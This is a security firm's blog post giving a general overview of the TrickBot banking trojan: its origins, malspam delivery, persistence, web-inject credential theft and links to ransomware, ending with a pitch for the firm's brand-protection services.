Blog

Trickbot, not just an ordinary hat trick

posted by: Paula Boyden date: Apr 29, 2021 category: All comments: 0

With almost everything going digital nowadays, the threat of being affected by malware is at an all-time high. This is why every business that conducts online transactions must be aware of how they can protect themselves. TrickBot, for instance, is one that is under watch today.

 

What is TrickBot?

TrickBot is known to originate as Trojan, a banking credential theft. Today, it is considered a modular malware firm armed with advanced system reconnaissance, association with follow-on ransomware attacks, and persistence capabilities. The MS-ISAC is continuously monitoring its threats and capabilities to the members of MS-ISAC.

 

A Quick Background Check

TrickBot is said to be a distant successor of the ZeuS banking Trojan that appeared and evolved in 2005. However, it is highly traced back to Dyre or Dyresa that went offline in 2015.

In 2016, TrickBot started to emerge, containing the elements of Dyre’s code and retaining the harvesting capabilities to steal banking credentials, together with web inject infrastructure. Today, TrickBot is a malware enterprise with many plugin modules, persistence capabilities, crypto mining, and evolving interaction with ransomware infections. At the beginning of June 2019, the MS-ISAC noticed a significant relationship between the TrickBot infections and Ryuk ransomware attacks. It also enticed the government’s attention and private entities’ concern in 2020.

 

TrickBot’s Technical Features

Interestingly, TrickBot is primarily disseminated using malspam campaigns or caused by other malware such as the popular dismantled Emotet. Malspam attracts the delivery of TrickBot in holiday greeting cards, invoices, traffic violations, and even the COVID-19 pandemic.

While security experts and researchers have noticed various vectors of infections, it appears that the usual infection source is malspam. Often, this malspam contains malicious macro-laden work documents.

When the malicious link or document is opened, the end-user will be prompted to enable certain macros and then implements a base64 obfuscated VBScript. With this, the initial TrickBot binary coming from an external server is also downloaded. TrickBot will also utilise various public data and resources, including icanhasip[.]com[3], to acquire the external IP address of the victim. After execution, TrickBot will write itself to the storage in the %AppData%Roaming% folder. Finally, TrickBot then unpacks its files with an encoded and obfuscated bot key, unique to the infected computer.

Even more, TrickBot also tries to disable any antivirus protection present in the system, such as Windows Defender. Once done, it will create a programmed task schedule of the system startup to make sure persistence is allowed.

All these initial actions give TrickBot the authority to receive and update commands and bot configurations. Not only that, but it can also load more plugin modules like dynamic link library (DLL) files located within the %Data% folder. The malware uses the unique bot key associated with that machine and decrypts follow-on DLL plugins. In 2019, Vitali Kremes, a security researcher, stated that TrickBot could also do a User Account Control (UAC) bypass in both Windows 7 and Windows 10. This is by allowing TrickBot to command and make system changes without any prompt request or user authorisation.

 

TrickBot As A Credential Theft

TrickBot is not just any ordinary malware. It uses web injects to acquire banking credentials and steal browser cookies. There are two types of web injects utilises by TrickBot:

  • Static injection or redirection attacks

This is done by sending a fake website to the users. Once a user accesses the website and navigates to the fraudulent banking site, the malware can steal the victim’s login details.

  • Dynamic injection or server-side injections

This is done by intercepting a response from the bank’s server and redirecting it to the server of a cyber threat actor (CTA). There is additional code added to the webpage before the site is sent to the client. That way, the CTAs can easily steal the banking information of the victim using from-grabbers.

 

TrickBot is something every bank account user needs to be aware of. This malware has a smart and resilient command and control infrastructure. It is also equipped with a follow-on framework for exploitation. Several infrastructures protect its numerous functions; thus, government and private entities fail to take it down successfully. This is why a reliable online cybersecurity agency should be contacted to protect business brands from cyber threats like TrickBot.

 

At FraudWatch International we been dedicated to protecting our clients’ brands all over the world since 2003now. For more details, make sure to contact us now.

 

 

 

Comments are closed.